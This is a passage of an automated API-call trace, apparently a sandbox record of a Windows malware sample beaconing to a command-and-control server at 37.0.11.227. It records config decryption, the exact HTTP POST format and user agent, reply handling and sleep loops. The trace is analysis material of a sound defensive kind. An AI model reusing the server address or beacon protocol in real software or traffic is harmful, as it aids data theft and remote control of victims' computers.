dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0213.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.635] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0213.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.636] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0213.636] GetProcessHeap () returned 0x690000 [0213.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0213.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.637] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0213.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.638] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0213.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.639] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0213.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.640] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0213.640] GetProcessHeap () returned 0x690000 [0213.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0213.641] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0213.641] GetProcessHeap () returned 0x690000 [0213.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0213.641] socket (af=2, type=1, protocol=6) returned 0x504 [0213.641] connect (s=0x504, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0213.670] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0213.670] GetProcessHeap () returned 0x690000 [0213.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0213.670] GetProcessHeap () returned 0x690000 [0213.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0213.671] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0213.672] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0213.672] GetProcessHeap () returned 0x690000 [0213.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0213.672] GetProcessHeap () returned 0x690000 [0213.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0213.673] GetProcessHeap () returned 0x690000 [0213.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0213.673] GetProcessHeap () returned 0x690000 [0213.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0213.674] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0213.674] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0213.674] GetProcessHeap () returned 0x690000 [0213.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0213.674] GetProcessHeap () returned 0x690000 [0213.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0213.675] send (s=0x504, buf=0x6ad508*, len=242, flags=0) returned 242 [0213.675] send (s=0x504, buf=0x6aba40*, len=159, flags=0) returned 159 [0213.675] GetProcessHeap () returned 0x690000 [0213.675] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0213.676] recv (in: s=0x504, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0213.773] GetProcessHeap () returned 0x690000 [0213.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0213.774] GetProcessHeap () returned 0x690000 [0213.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0213.774] GetProcessHeap () returned 0x690000 [0213.775] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0213.775] GetProcessHeap () returned 0x690000 [0213.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0213.776] closesocket (s=0x504) returned 0 [0213.776] GetProcessHeap () returned 0x690000 [0213.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0213.776] GetProcessHeap () returned 0x690000 [0213.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0213.777] GetProcessHeap () returned 0x690000 [0213.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0213.777] GetProcessHeap () returned 0x690000 [0213.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0213.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf08) returned 0x504 [0213.779] Sleep (dwMilliseconds=0xea60) [0213.782] GetProcessHeap () returned 0x690000 [0213.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0213.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.783] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.788] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0213.794] GetProcessHeap () returned 0x690000 [0213.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0213.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.795] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0213.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.796] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.797] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.797] GetProcessHeap () returned 0x690000 [0213.797] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0213.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.799] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0213.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.801] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0213.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.802] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0213.802] GetProcessHeap () returned 0x690000 [0213.802] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0213.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.804] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.804] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.805] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.806] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.806] GetProcessHeap () returned 0x690000 [0213.806] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0213.806] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.807] GetProcessHeap () returned 0x690000 [0213.807] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0213.807] GetProcessHeap () returned 0x690000 [0213.807] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0213.807] GetProcessHeap () returned 0x690000 [0213.808] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0213.808] GetProcessHeap () returned 0x690000 [0213.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0213.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.811] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.829] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0213.836] GetProcessHeap () returned 0x690000 [0213.836] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0213.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.837] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0213.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.838] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.839] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.839] GetProcessHeap () returned 0x690000 [0213.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0213.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.841] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0213.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.842] CryptDestroyKey (hKey=0x69d628) returned 1 [0213.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.843] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0213.843] GetProcessHeap () returned 0x690000 [0213.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0213.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.845] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0213.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.846] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0213.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.847] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0213.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.848] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0213.848] GetProcessHeap () returned 0x690000 [0213.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0213.848] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0213.848] GetProcessHeap () returned 0x690000 [0213.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0213.849] socket (af=2, type=1, protocol=6) returned 0x508 [0213.849] connect (s=0x508, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0213.876] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0213.876] GetProcessHeap () returned 0x690000 [0213.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0213.876] GetProcessHeap () returned 0x690000 [0213.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0213.877] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0213.878] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0213.878] GetProcessHeap () returned 0x690000 [0213.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0213.878] GetProcessHeap () returned 0x690000 [0213.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0213.879] GetProcessHeap () returned 0x690000 [0213.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0213.879] GetProcessHeap () returned 0x690000 [0213.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0213.880] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0213.881] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0213.881] GetProcessHeap () returned 0x690000 [0213.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0213.881] GetProcessHeap () returned 0x690000 [0213.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0213.882] send (s=0x508, buf=0x6ab500*, len=242, flags=0) returned 242 [0213.883] send (s=0x508, buf=0x6aba40*, len=159, flags=0) returned 159 [0213.883] GetProcessHeap () returned 0x690000 [0213.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0213.883] recv (in: s=0x508, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0213.979] GetProcessHeap () returned 0x690000 [0213.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0213.980] GetProcessHeap () returned 0x690000 [0213.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0213.980] GetProcessHeap () returned 0x690000 [0213.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0213.981] GetProcessHeap () returned 0x690000 [0213.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0213.981] closesocket (s=0x508) returned 0 [0213.982] GetProcessHeap () returned 0x690000 [0213.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0213.982] GetProcessHeap () returned 0x690000 [0213.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0213.983] GetProcessHeap () returned 0x690000 [0213.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0213.983] GetProcessHeap () returned 0x690000 [0213.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0213.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xdc0) returned 0x508 [0213.987] Sleep (dwMilliseconds=0xea60) [0213.988] GetProcessHeap () returned 0x690000 [0213.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0213.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.989] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.000] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0214.008] GetProcessHeap () returned 0x690000 [0214.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0214.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.009] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0214.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.010] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.011] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.011] GetProcessHeap () returned 0x690000 [0214.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0214.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.029] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0214.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.031] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0214.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.032] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0214.032] GetProcessHeap () returned 0x690000 [0214.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0214.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.034] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.035] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.036] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.037] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.037] GetProcessHeap () returned 0x690000 [0214.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0214.037] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.038] GetProcessHeap () returned 0x690000 [0214.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0214.039] GetProcessHeap () returned 0x690000 [0214.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0214.039] GetProcessHeap () returned 0x690000 [0214.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0214.039] GetProcessHeap () returned 0x690000 [0214.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0214.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.040] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.049] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0214.056] GetProcessHeap () returned 0x690000 [0214.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0214.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.058] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0214.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.059] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.060] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.060] GetProcessHeap () returned 0x690000 [0214.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0214.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.061] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0214.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.062] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0214.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.063] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0214.063] GetProcessHeap () returned 0x690000 [0214.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0214.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.065] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0214.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.066] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0214.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.067] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0214.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.068] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0214.068] GetProcessHeap () returned 0x690000 [0214.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 